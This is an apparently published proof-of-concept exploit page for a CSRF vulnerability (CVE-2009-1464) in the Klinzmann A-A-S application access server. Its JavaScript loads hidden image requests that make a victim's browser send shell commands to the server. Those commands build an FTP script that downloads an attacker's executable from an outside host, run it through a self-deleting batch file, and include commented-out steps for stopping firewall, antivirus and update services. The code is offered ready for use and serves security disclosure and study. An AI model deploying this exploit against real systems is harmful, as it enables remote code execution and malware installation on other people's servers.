Klinzmann A-A-S 2.0.48 XSRF Exploit

`<html>  
<body>  
  
<!--  
****************************************************************  
AASHack 1.0 (By Felipe M. Aragon)  
Affected Versions: AAS 2.0.48 and possibly older versions  
  
This is an exploit demonstration code for the A-A-S (Application  
Access Server) index.aas job parameter XSRF vulnerability  
(CVE-2009-1464)  
  
This script has been successfully tested on IE 7.0 and Firefox  
3.08. Should work on any browser that has javascript enabled  
  
Vulnerability found by Syhunt (http://www.syhunt.com)  
  
This script should be used only by system administrators (or  
other people in charge). Read the text below before making any  
use of this script.  
  
(c) 2009 Syhunt Cyber Security Company. All rights reserved.  
  
This script is provided 'as-is', without any expressed or implied  
warranty. In no event will the author be held liable for  
any damages arising from the use of this script.  
Permission is granted to anyone to use this script, and to alter  
it and redistribute it freely, subject to the following  
restrictions:  
  
1. The origin of this script must not be misrepresented, you  
must not claim that you wrote the original code.  
2. Altered source versions must be plainly marked as such, and  
must not be misrepresented as being the original script.  
3. This notice may not be removed or altered from any source  
distribution.  
  
If you have any questions concerning this license, please email  
contact _at_ syhunt _dot_ com  
****************************************************************  
-->  
  
<script>  
// Javascript is used to force the browser to sequentially load  
// the images that will trigger the server commands.  
  
var dd=1000; // default delay time (ms)  
var aas_url='http://[host]:6262'; // target AAS host  
var ftp_host='x.x.x.x'; // attacker ftp host  
var ftp_user='anonymous';  
var ftp_pass='123456';  
var ftp_commands_file='aashack.ftp';  
var batch_file='aashack.bat';  
var attacker_file='file.exe'; // file to upload  
  
function delay(ms) {  
var date = new Date();  
var curDate = null;  
do { curDate = new Date(); }  
while(curDate-date < ms);  
}  
  
function writeimg(job,action,select) {  
var act = escape(action);  
var sel = escape(select);  
document.write('<img src="'+aas_url+'/index.aas?job='+job+'&action='+act+'&select='+sel+'" style="visibility:hidden;">');  
}  
  
// Main Functions  
function Run(action,dms) { writeimg('command',action,''); delay(dms); }  
function Console(cmdline,dms) { Run('cmd /C '+cmdline,dms); }  
function AddFTPCmd(cmdline) { Console('echo '+cmdline+'>>'+ftp_commands_file,dd); }  
function AddBatchLine(line) { Console('echo '+line+'>>'+batch_file,dd); }  
//function Kill(exename) { Run('taskkill /f /im '+exename,dd); } // alternative way to kill a process  
function StopSvc(servicename) { writeimg('setservice','stop',servicename); delay(dd); }  
function KillProcess(exename) { writeimg('killprocess','',exename); delay(dd); }  
  
function StopUndesiredServices() {  
//StopSvc("somefirewall");  
//StopSvc("someantivirus");   
//StopSvc("wuauserv"); // Automatic Updates  
}  
  
function KillUndesiredProcesses() {  
//KillProcess('firewall.exe');  
}  
  
AddFTPCmd(ftp_user);  
AddFTPCmd(ftp_pass);  
AddFTPCmd('binary');  
AddFTPCmd('get '+attacker_file);  
AddFTPCmd('close');  
AddFTPCmd('bye');  
AddBatchLine('@echo off');  
AddBatchLine('ftp -is:'+ftp_commands_file+' '+ftp_host);  
AddBatchLine('start '+attacker_file);  
AddBatchLine('del '+ftp_commands_file);  
AddBatchLine('del %0'); // self-destruct  
StopUndesiredServices();  
KillUndesiredProcesses();  
Run(batch_file,dd);  
</script>  
  
</body>  
</html>  
  
  
`